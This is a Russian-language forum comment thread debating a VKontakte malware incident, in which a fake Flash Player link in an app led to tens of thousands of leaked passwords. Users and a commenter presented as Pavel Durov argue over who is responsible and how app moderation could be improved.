    Alex Kruglov ВКонтакте

    soomrack >>интересно, какие данные на него есть во вконтакте, Данные на человека у ВК стандартные — почта, айпи и т. д. Почта и телефон ничем не помогут — если страница была взломана то вины изначального разработчика нет, а заведомые хацкеры пока не настолько считают себя крутыми чтобы указывать свои реальные контактные данные. >>А если легко украсть аккаунт разработчика О том как взломать страницу думаю вам известно — спосбоы давно описаны и подходят для всех социалок. Все мы люди и иногда совершаем ошибки, так возможно произошло и с создателем приложения. И вины контакта в этом никакокй. >> Не 122 тысячи, а всего 42. Всё равно цифра очень большая. [наглый пиар] Приложение рекламируемое в топ1 группе (20к уников в сутки) набрало всего 5000 пользователей за неделю [/наглый пиар]

  • Ответить
    Альтер Эго

    >а ушерб то откровенно минимален в 99% Ну, знаете, 40 тысяч аккаунтов (и не одного контакта) в _открытом_ доступе — это отличная шутка, да.

  • Ответить

    ВКонтакте был и остается самым безопасным местом в сети. Внутри ВКонтакте вирус невозможно подцепить даже теоретически. Только выйдя за его пределы и игнорировав все предупреждения, можно установить себе заразу. Пользователям в описании приложения предлагалась ссылка: «необходим новый флеш-плеер, скачать здесь». С него пользователи переходили на наше предупреждение о небезопасной ссылке, дальше на сторонний сайт (разумеется, не Adobe), дальше в некоторых случаях игнорировали предупреждение браузера и игнорировали предупреждение от ОС, устанавливая вирус. ВКонтакте API или какие-то мифические «внутренние уязвимости» ВКонтакте здесь не причем и являются в данном контексте плодом воображения непрофессиональных журналистов. Имело место стандартное для всех вирусов распространение некой внешней ссылки и ее игнорирование некоторыми неосторожными пользователями. В этой истории возникает закономерный вопрос — зачем хакерам делать публичным список паролей, если сразу после этого их сменят и затронутых пользователей предупредят? В этом случае они просто лишаются десятков тысяч спам-ботов, неся убытки. Реально было около 20 тысяч работающих паролей, все они были сброшены, пользователи были предупреждены в течение суток. Это одна двадцатая процента пользователей, причем часть из них и так была ботами. Вообще же в Контакте в день регистрируется в 3−4 раза больше пользователей, чем указанная цифра. Поэтому на новостной повод данный «вирус» не тянет никак. Похоже, шумиха такого рода имеет смысл только как чья-то пиар-акция. Дополнительные меры, о которых шла речь выше (ssl, измененная работа с cookies), разумеется, внедряются, только к такого рода «вирусам» они не имеют никакого отношения и никого бы ни от чего в данном случае не спасли. На самом деле, выход один — постепенное повышение компьютерной грамотности пользователей.

  • Ответить

    >а господина Дурова в лучших комментариях мы не дождемся? Паша, выходи! Паша! молчит, не дает ответа….((А чего ему с дураком разговаривать? Вообще учитывая сколько человек тянут такую махину, стоит предположить что специалисты там очень высокого класса. Молодцы они. Однако, ребят, отвечать за прирученных пользователей — за их глупость, болячки и беды тоже надо. @zhecka >не соглашусь. если вы изначально снимаете шлюху на ленинградке, то должны понимать, что 1 шанс из 100, что вы ничего не подцепите. Если дядя угощает конфеткой и предлагает покатать в машине, кто виноват если ребенок сядет в машину? По моему основы собственной безопасности детям объясняют в детстве. И плохи те родители которые это детям не объяснили. прав? Вы давайте, эта. детский сад не устраивайте. Если человек сглупил, не знал или забил это не говорит о том что его не надо лечить, пытаться отвадить от таких привычек и воспитывать. Множество людей инфантильны по своей природе, но это не освобождает никого от социальной ответственности за них. Однако, что-то накал глупости в этой области в отрасли весьма высок. Благо законы пока не охватили эту область, иначе не рассуждали бы «о правах» совершенно забывая про «обязанности».

  • Ответить
    Альтер Эго

    Насчет дурака — Павел все же вышел поговорить, так что не надо =) Можно ли прояснить такое непонятное место: «Реально было около 20 тысяч работающих паролей, все они были сброшены, пользователи были предупреждены в течение суток. Это одна двадцатая процента пользователей, причем часть из них и так была ботами.» Т.е. как администрация поняла, какие пароли работают, а какие нет? Часть юзеров была ботами? Т.е. боты сами ходили по ссылке левой и скачивали себе что-то? Ничего себе oO

  • Ответить

    cryuglov >>интересно, какие данные на него есть во вконтакте, >Данные на человека у ВК стандартные — почта, айпи и т. д. Почта и телефон ничем не помогут — если страница была взломана то вины изначального разработчика нет, а заведомые хацкеры пока не настолько считают себя крутыми чтобы указывать свои реальные контактные данные. Это да, поэтому я считаю, что надо требовать предъявление паспорта для купных приложений, хотя бы через руцентр (у него такое право есть, пусть регистрируют домен и привязывают его к приложению). >>А если легко украсть аккаунт разработчика >О том как взломать страницу думаю вам известно — спосбоы давно описаны и подходят для всех социалок. Все мы люди и иногда совершаем ошибки, так возможно произошло и с создателем приложения. И вины контакта в этом никакокй. Да, даже целенаправленная фишинговая атака работает почти всегда, даже на продвинутых пользователей и вебпрограммистов. Но ведь для разработчиков можно и посильнее ограничения ввести — например заливание новой версии программы только через смс-подтверждение, причем телефон тот, который указан при регистрации, думаю для соц сети с таким кол-вом пользователей подобный сервис внедрить не очень сложно. А если защита такая же как и для рядовых пользователей, то это точно существенная недоработка вконтакте (мягко говоря). Все равно что обезьям запирать на замок-щеколду, а потом говорить — убежали потому что недосмотрели. >>Не 122 тысячи, а всего 42. >Всё равно цифра очень большая. [наглый пиар] Приложение рекламируемое в топ1 группе (20к уников в сутки) набрало всего 5000 пользователей за неделю [/наглый пиар] Большая, но думаю, что хорошая спам рассылка за сутки на фишинговые сайты столько же соберет, а реализуется гораздо быстрее и дешевле.

  • Ответить

    >а заведомые хацкеры пока не настолько считают себя крутыми чтобы указывать свои реальные контактные данные Ну это глупость просто. Идиоты это делают. @durov >В этой истории возникает закономерный вопрос — зачем хакерам делать публичным список паролей, если сразу после этого их сменят и затронутых пользователей предупредят? Резонанс. Несмотря на увеличивающуюся тенденцию к «тихим операциям», которые имеют целью криминальный заработок не спадает вал желающих «нашуметь и самоутвердится», именно этим объясняется крайне низкое качество реализации большинства вирусов. Юнцы чему-то научившись «пытаются взять планету за яйца».

  • Ответить

    > ВКонтакте был и остается самым безопасным местом в сети. Внутри ВКонтакте вирус невозможно подцепить даже теоретически. Только выйдя за его пределы и игнорировав все предупреждения, можно установить себе заразу. Мда. Но стоило бы еще запретить прямые ссылки на флеш и пр. опасные штуки (только прямые ссылки). > Дополнительные меры, о которых шла речь выше (ssl, измененная работа с cookies), разумеется, внедряются, только к такого рода «вирусам» они не имеют никакого отношения и никого бы ни от чего в данном случае не спасли. На самом деле, выход один — постепенное повышение компьютерной грамотности пользователей. Горбатого могила исправит. Поэтому надо делать для «горбатых». Для счастья компьютер человеку не нужен и изучать его он тоже не хочет и не будет. Кроме того не стоит забывать, что с каждым месяцем дурят пользователя все лучше и лучше.

  • Ответить
    Alex Kruglov ВКонтакте

    soomrack >>А если защита такая же как и для рядовых пользователей, то это точно существенная недоработка вконтакте (мягко говоря). Ну не знаю :) У меня вроде бы такая же. А вот например группа моя имеет дополнительную степень защиты :) >>пусть регистрируют домен и привязывают его к приложению). А деньги они как зарабатывать будут? :) С весны 2009 года мы предоставляем возможность получить прямой адрес Вашего приложения, например: chat.vkontakte.ru casino.vkontakte.ru Однако во избежание массовой регистрации узнаваемых имен с целью перепродажи в данный момент услуга является платной (4000 голосов)

  • Ответить

    >>пусть регистрируют домен и привязывают его к приложению). >А деньги они как зарабатывать будут? :) >С весны 2009 года мы предоставляем возможность получить прямой адрес Вашего приложения, например: chat.vkontakte.ru casino.vkontakte.ru Однако во избежание массовой регистрации узнаваемых имен с целью перепродажи в данный момент услуга является платной (4000 голосов) Точно так же, просто если вконтакте не может требовать предъявление паспорта, то можно требовать чтобы приложение имело офиц. домен с хелпом и пр., т.е. только как бонус.

  • Ответить

    >Бесплатная пиар акция касперскому? :) Всё может быть… Ну у вас и Касперский небось лично сотку вирусов в сутки генерит специальной секретной прогой. Иначе ведь как же свой антивирус толковым пацанам продать? Правда? >Мда. Но стоило бы еще запретить прямые ссылки на флеш и пр. опасные штуки (только прямые ссылки). Вот лишь бы сказать чета в ответ. Там все ссылки идут через редиректор, который как положено о всем предупреждает и просто так, скрыто, ничего загрузить не даст. Это единственно верное, универсальное решение.

  • Ответить

    Вот тут все это обсуждают-а никто не подскажет как решить эту проблему? После манипуляций глупого ребенка на компе перестали открываться все поисковики-все остальное работает! Файл хост вроде проверял-вирусов нет Проблема именно на этом компьютере, т к ноут через вай фай работает норм Заранее благодарю damos776@mail.ru

  • Ответить

    durov: Пользователям в описании приложения предлагалась ссылка: «необходим новый флеш-плеер, скачать здесь». С него пользователи переходили на наше предупреждение о небезопасной ссылке Да вы же все ссылки предваряете этим предупреждением, невзирая на их опасность. Такое предупреждение — всё равно что его отсутствие, может вызвать только раздражение. Вот, к примеру, если бы там была ссылка на настоящий адобовский плеер, то разве предупреждение об опасности не показалось бы? А тогда какой с него толк, если оно всегда одинаковое даже для вполне легальных ссылок?

  • Ответить
    Альтер Эго

    а чо, отмазка есть и ладно! А так — вконтакте был, есть и будет самым безопасным местом интернета, даже боты не боятся там скачивать вирусы!

  • Ответить
    Альтер Эго

    >ВКонтакте был и остается самым безопасным местом в сети. А 40 тысяч паролей в открытый доступ выложили ЗЛОУМЫШЛЕННИКИ!

  • Ответить

    >А так — вконтакте был, есть и будет самым безопасным местом интернета, даже боты не боятся там скачивать вирусы! Вот вы извините дурак или как? Вам было сказано что среди раскрытых аккаунтов было много ботов, что говорит о том что они сходили на левый айпишник и не туда отдали свои логин-пароль, отчего и попали в лог, а не скачали себе вирус. А как такое могло быть? Да просто. Вы скачали себе вирус о котором речь, а от вас в качестве бота регулярно ходит вконтакт троянчик (юнит ботнета) или того увереннее руткит, и вы своим оком этого не видите, ведь ботам нужна разветвленная сеть и распределенная по времени картина действий иначе ip-фильтры, спам-листы и фильтры активности их легко обезвредят, а у в контакте они крепко и уверенно настроены. Предсталяете как бывает? Как обычно. Ничего не понимаю, но мнение имею!!! Бумага все стерпит.

  • Ответить

    На самом деле и будущем простая предмодерация приложений от таких проблем не защитит. Злоумышленник легко может сменить уже проверенную версию на «вирусную». Модерация же после каждого изменения приложения — это большой гемор для разработчиков, качество нормальных приложений резко ухудшится из-за долгого ожидания модерации. На мой взгляд оптимально было ввести что типа «перонального аттестата» как у webmoney. Т.е.разработчик приложений единожды подтверждает свою личность (через нотариально оформленные документы), после чего может сколько угодно менять свое приложения без модерации. Приложения не прошедших «персонализацию» просто запретить использовать кому либо кроме автора. Эта же процедура будет полезна из финансовой точки зрения (для обналичивания заработанных «голосов»)

  • Ответить
    Альтер Эго

    >а у в контакте они крепко и уверенно настроены. А что же вконтакт не зобанит ботов превентивно?

  • Ответить

    >А что же вконтакт не зобанит ботов превентивно? Если вы тот же алтерега то вы натурально дурак, честное слово, извините. Идите предложите милиции засадить всех потенциальных приступников в тюрьму на всю жизнь, тогда, да, поборем преступность. Вы в состоянии отличить вредоносную активность от потенциальной угрозы её возникновения. Так вот потенциально вредоносными действиями является большинство всех доступных действий, мозгов превентивно их перекрыть пока ни у кого не хватило, поэтому перекрывают по факту констатации их вредоносной и умышленной направленности.

  • Ответить

    есть соображение по поводу публикации паролей и почт в паблике — первые в словарь обновить, вторые для спамеров. интересно? про пиар ЛК — сомнительная идея в стиле «разработчики антивирусов пишут вирусы или находятся заодно с кодерами». Кто видел пароли, насколько они интересны вообще?

  • Ответить

    @alkalinin >Вот, к примеру, если бы там была ссылка на настоящий адобовский плеер, то разве предупреждение об опасности не показалось бы? А тогда какой с него толк, если оно всегда одинаковое даже для вполне легальных ссылок? А чего тут поделать? Как проверить хороша ссылка или нет? Да, некоторые по содержанию параметров можно детектировать как нехорошие. А остальные? Проверять содержимое её на наличие вреда потенциального? Это в нынешних условиях, без сотрудничества с антивирусными лабораториями и накопленной базы малореально. А на лету проверять перед переходом вообще не представляется возможным.

  • Ответить
    Альтер Эго

    Адвокаты (да и сам Дуров) конкретно доставляют. Вы уж разберитесь, либо умеете отличать ботов (тогда почему не зобанили), либо не умеете (тогда почему ботами обзываетесь). Cменили пароли — и выслали их на те адреса, к которым в соседнем файлике лежали пароли? Вконтакт безопасен, а утечка 40 тыс паролей — это минимальная доля процента, а значит фигня? Убийца убил двух человек, это одна семидесятимиллионная (а в мировом масштабе и того меньше), хрен с ним? Переход по внешней ссылке — с предупреждением, но 40 тысяч идиотов предупреждение проигнорировали? Получается, что либо приложение было гораздо популярнее 40 тысяч, либо предупреждение абсолютно не работает? Тут получилось так, что файлик с паролями нашли (либо его специально выложили, дабы опозорить). А сколько таких файликов не нашли? И не прячьте голову в песок, пол бетонный.

  • Ответить

    >Вы уж разберитесь, либо умеете отличать ботов (тогда почему не зобанили), либо не умеете (тогда почему ботами обзываетесь). Спросите у своего участкового — умеет ли он выявлять криминальный элемент? Если да тогда — Где посадки? © И сообщите что до тех пор пока в стране кто-то будет «жить не честно» милиция будет сбродом отребья и дармоедов. Там вас определят куда надо после таких речей. >Вконтакт безопасен, а утечка 40 тыс паролей — это минимальная доля процента, а значит фигня? Убийца убил двух человек, это одна семидесятимиллионная (а в мировом масштабе и того меньше), хрен с ним? А еще сообщите, что в том что вас на улице ограбили или в том что вы стали жертвой финансовой пирамиды виновата вся милиция вместе взятая и Путин лично, а никак не ваше неумение элементарно защитить себя от пьяного хулигана и не вестись на дурные вывески с щенячьим доверием. >Переход по внешней ссылке — с предупреждением, но 40 тысяч идиотов предупреждение проигнорировали? Получается, что либо приложение было гораздо популярнее 40 тысяч, либо предупреждение абсолютно не работает? Вам как представителю многотысяных орд прежде следует подружится с элементарной логикой, а потом рассуждать и делать выводы. Нет ничего страшнее индивидуума который ни хрена не зная начинает делать выводы. Вы элементарно ведете беседу по принципу «все что знал рассказал — козлов к ответу». >Тут получилось так, что файлик с паролями нашли (либо его специально выложили, дабы опозорить). А сколько таких файликов не нашли? Такие как вы не могут просто жить без объектов для «мастдая». А вот шутка ли сказать… Не выложили ли этот файлик с целью шуму навести или кто его все-таки нашел на безвестном сервере черте где?

  • Ответить
    Альтер Эго

    >Вам как представителю многотысяных орд прежде следует подружится с элементарной логикой, а потом рассуждать и делать выводы. По существу не будет ответа? Пол — бетонный!

  • Ответить

    Господа, кто-нибудь правила ВКонтакте читал? Цитаты: «# 1. Сайт содержит (или может содержать) ссылки на другие вебсайты (сайты третьих лиц) так же, как и статьи, фотографии, иллюстрации, графические изображения, музыку, звуки, видео, информацию, приложения, программы и другой Контент, принадлежащий или исходящий от третьих лиц (Контент третьих лиц); # 2. Указанные третьи лица и их Контент не проверяются Администрацией на соответствие тем или иным требованиям (достоверности, полноты, добросовестности и т. п.). Администрация не несет ответственность за любую информацию, размещенную на сайтах третьих лиц, к которым вы получили доступ через Сайт или через Контент третьих лиц, включая, в том числе, любые мнения или утверждения, выраженные на сайтах третьих лиц или в их Контенте; # 3. Размещенные на Сайте ссылки или руководства по скачиванию файлов и (или) установке программ третьих лиц не означают поддержки или одобрения этих действий со стороны Администрации; # 4. Ссылка на любой сайт, продукт, услугу, любую информацию коммерческого или некоммерческого характера, размещенная на Сайте, не является одобрением или рекомендацией данных продуктов (услуг) со стороны Администрации; #5. Если Вы решили покинуть Сайт и перейти к сайтам третьих лиц или использовать или установить программы третьих лиц, Вы делаете это на свой риск и с этого момента настоящие Правила более не действуют. В Ваших дальнейших отношениях Вам стоит руководствоваться применимыми нормами и политикой, в том числе деловыми обычаями тех лиц, чей Контент Вы используете. # 3. Так как Сайт является открытым для всеобщего доступа и непремодерируемым информационным ресурсом, Администрация не несет никакой ответственности за любой Контент пользователей или третьих лиц, размещенный на Сайте или с его помощью; # 4. Администрация не отвечает за любое поведение пользователей или третьих лиц, использующих или просматривающих Сайт, как в режиме онлайн, так и вне сети Интернет (в оффлайн); # 7. Администрация не несет ответственности за любой ущерб компьютеру пользователя или иного лица, мобильным устройствам, любому другому оборудованию или программному обеспечению, вызванный или связанный со скачиванием материалов с Сайта или по ссылкам, размещенным на Сайте.» пруфлинк

  • Ответить

    cryuglov >> Павел, а преможерацию то приложение как прошло? Это же главный вопрос :) Оно его, разумеется, не прошло. Поэтому переход по ссылке предварялся предупреждением. Любой пользователь при отсутствии ограничений со стороны ОС в состоянии установить себе любую программу с любых ресурсов, в том числе и вирус. Мы можем только предупредить, то же самое может сделать браузер и система. Дальнейшее развитие событий вне нашей власти.

  • Ответить

    > Множество людей инфантильны по своей природе, но это не освобождает никого от социальной ответственности за них. Простите, и меня тоже не освобождает? Не помню, когда я брал на себя какую-то ответственность за кого-то помимо своих близких. Идея, что общество должно пойти на любые крайности, чтобы защитить всех своих членов мне представляется крайне опасной. Если факты, изложенные Павлом Дуровым верны, то происшествие можно считать исчерпаным — вредоносную ссылку убрали, пострадавших пользователей уведомили (по крайней мере, сделали все возможное), возможно, им это послужит уроком. Можно еще попытаться сдать компетентным органам имеющуюся инфу на автора — не знаю, интересует ли это компетентные органы. Все, case closed

  • Ответить

    >Простите, и меня тоже не освобождает? Не помню, когда я брал на себя какую-то ответственность за кого-то помимо своих близких. Нет, что вы. Все должны исключительно вам, вы же никому ничего не должны. Какую ответственность брали на себя вы лично — мало кого интересует, интересно какая ответственность за вами закреплена по закону как за гражданином, должностным лицом и т. п. А то права есть у всех, а обязанностей ни у кого. А вообще, если вы понимаете, конечно, речь-то шла об ответственности сети вконтакте за подобные эпидемии и их предотвращение. Они страются и делают многое чтобы их не было, но тем не менее если подобные действия со стороны массовых сервисов станут не добровольными и сознательными, а обязательными и законодательными будет лучше.

  • Ответить

    Я, конечно, понимаю. Но я так же понимаю, что ситуация, когда массовые сервисы понимают свою ответственность и добровольно делают многое, но в пределах разумного, кто больше, кто меньше — нормальна. Если же действия станут обязательными и законодательными, то мы получим: а) очередную кучу чиновников, которые будут составлять правила, рекомендации и следить за их выполнением; б) очередное обязательное требование, от которого все отделываются пустыми формальностями — по аналогии со страницами «если вам нет 18, немедленно уходите отсюда!» на порносайтах, но которое будет требовать кучи бумажек. в) наконец, еще один инструмент для давления на компании и общество группам навязчивой с идеей (например, при наличии желаемого вами закона, в случае подобного факапа от ВКонтакте вполне можно будет требовать компенсации ущерба) — такое явление легко проследить в США. Мне это не кажется нормальным, пусть уж лучше периодически происходят взломы и потери паролей. Тем более, что реальный ущерб от всего это происшествия весьма ограничен — для большинства (подчеркиваю, большинства — не всех) пользователей информация на их почтовых аккаунтах и в социальных сетях не критична. P. S.: Разумеется, я сторонник ограничения регулирующей роли государства в жизни своих граждан.

  • Ответить
    kot

    http://www.vesti.ru/doc.html?id=306606 Павлу Дурову приписали слова из заголовка этой темы («Приложение Подводный мир 2, заблокированное на данный момент администрацией «В контакте», подсадило вирус и украло пароли более чем у 130 тысяч пользователей.»), которые он вовсе не говорил. Это непрофессионализм (Плюшев ушел в отпуск, а больше адекватных журналистов для vesti.net у Туганбаева не нашлось) или же заказ? Думаю, крупным общенациональным телеканалам было бы полезно увеличить долю частного капитала и работать в конкурентной среде, чтобы таких ляпов (или наездов?) не возникало.

  • Ответить
    Альтер Эго

    У ВГТРК давно есть претензии к «В контакте» и иски даже подавали. Так что сейчас просто почуяли жареное, сбежались на добычу. То что Плющева нет, это даже хорошо — ему не придется краснеть и оправдываться, также его не будут ломать через хребет.

  • Ответить
    Альтер Эго

    >> P. S.: Разумеется, я сторонник ограничения регулирующей роли государства в жизни своих граждан. Разумеется. А кому это интересно? Вы не политик, не мыслитель, не писатель. Не богатый бизнесмен, не олимпийский чемпион и не герой войны. У вас нет хоть какого-то рычага — денег, власти, ума, дара слова. Репутации тоже никакой особенной нет. Ну будь вы хоть чего сторонником, какое это имеет значение? Ваши взгляды не имеют веса. Ну жене скажите на кухне, что вы за ограничение роли государства. Это уж я не говорю о том, откуда берутся такие взгляды, что это все от недомыслия и шаблонного мышления.

  • Ответить
    Альтер Эго

    Граждане, я все более в недоумении! 1) Приложение не прошло модерацию т.е. не попало в список приложений (правильно?) 2) Переход на приложение сопровождался предупреждением перед ссылкой 3) и оно все-равно набрало 40 тысяч пользователей? Как это вообще может быть 4) И что это за половина (20 тысяч) ботов, которые кликали в предупреждение перед ссылкой? Безумно странная история. Ведь сам факт распространения «через приложение ВКонтакте» вроде бы администрация не отрицает?

  • Ответить
    Альтер Эго

    А вот Дуров нам пишет «ну разумеется не прошло». Выдает желаемое за? В репортаже вестей, помянут, кстати, еще и «Коктейль другу 2». Типа тоже зобанено, но в скриншоте там 3.6 с хреном миллиона пользователей показано.

  • Ответить
    Alex Kruglov ВКонтакте

    3,6 млн у основного приложения. А то что в контакте куда хомячков с отрицательным айкью которые ставят 100500 кокотейлей фермеру восьмое пришествие — это проблема отсутствия мозгов в стране, а не контакта в частности. Ну «нельзя детям в интернет» (с)

  • Ответить
    Альтер Эго

    В скриншоте «Коктейль другу 2» — 3.6 млн. И все-таки, как неосновное, непрошедшее модерацию и так далее приложение может набрать 40 тысяч идиотов? Где они его нашли, чтобы проигнорировать предупреждение?

  • Ответить

    >>И все-таки, как неосновное, непрошедшее модерацию и так далее приложение может набрать >>40 тысяч идиотов? Где они его нашли, чтобы проигнорировать предупреждение? очень просто. С зараженных каким либо трояном компов (либо с угнанных аккаунтов) добавляются предложения и посылаются об этом уведомления друзьям. Ну, а дальше — по цепной реакции — добавляются всё больше и больше народу. Сейчас тоже самое происходит с приложением «Найди друга по телефону» — двое друзей у меня постоянно «добавляют» это приложение к себе (причем с разными id) и уведомляют об этом. http://vkontakte.ru/app717814 http://vkontakte.ru/app717806 http://vkontakte.ru/app717481 и т. д. Эти приложения периодически удаляют (в том числе и я посылаю жалобы на них), но они опять появляются. «Зараженные» друзья опять их добавляют ну и т. д.

  • Ответить
    Альтер Эго

    То есть, вирус сам помечает всех зараженных пользователей, добавляя свое приложение к ним в список? Прекрасная функциональность. После этого уже не приходится удивляться тому, что лог с паролями оказался общедоступен

  • Ответить

    >>То есть, вирус сам помечает всех зараженных пользователей, добавляя свое приложение к ним в список? Ну, разумеется, не все у кого добавлено приложение заразились, некоторые сами добавляют по совету зараженных друзей. (В приведенном мной выше примере заражений вообще нет, приложение тупо разводит на бабки) Но сути это не меняет.

  • Ответить
    Alex Kruglov ВКонтакте

    Да там и без ботнетовцев полно школоты которые прямо таки свято верят в халяву, веселого фермера 2 и прочую херню. 40 тысяч это не так много.

  • Ответить
    Альтер Эго

    Ну то бишь достаточно зафильтровать рассылку по списку контактов уведомлений/анонсов о неотмодерированных приложениях и сразу станет сильно легче?

  • Ответить
    Альтер Эго

    В фейсбуке было приложение happy harvest (с которого и скопировали веселого фермера). Но там такой шизы с паролями и прочим обманом вроде нет. Или просто я не знаю?

  • Ответить
    Альтер Эго

    Ладно доступ к Вконтакте прое… Так ведь еще аналогичные пароли могут быть использованы на почту, аську и так далее. У многих один и тот же пароль повсюду используется.

  • Ответить

    Косвенно, но в тему. Недавно статья на ленте.ру была: http://lenta.ru/news/2009/08/06/vkont/ «МВД признало сеть «Вконтакте» главным хранилищем детской порнографии в Рунете — Более половины детской порнографии Рунета, выявленной правоохранительными органами в 2009 году, находилось в социальной сети «Вконтакте», сообщает «Интерфакс» со ссылкой на заявление представителя управления «К» МВД РФ Ирины Зубаревой. … Администрация ресурса, по словам Зубаревой, делает вид, что не замечает распространения подобных материалов. … «Ленте.ру» пока не удалось получить комментарий представителей социальной сети. Позднее они заявили «Интерфаксу», что сотрудничают с правоохранительными органами…» Так же там было напечатано, что Вконтакте «принадлежит половина трафика Рунета». 1. Что-то вокруг этой соц.сети тучи сгущаются. 2. Возможно пассивная, а местами просто формальная, позиция по фильрации плохого контента должна смениться активной.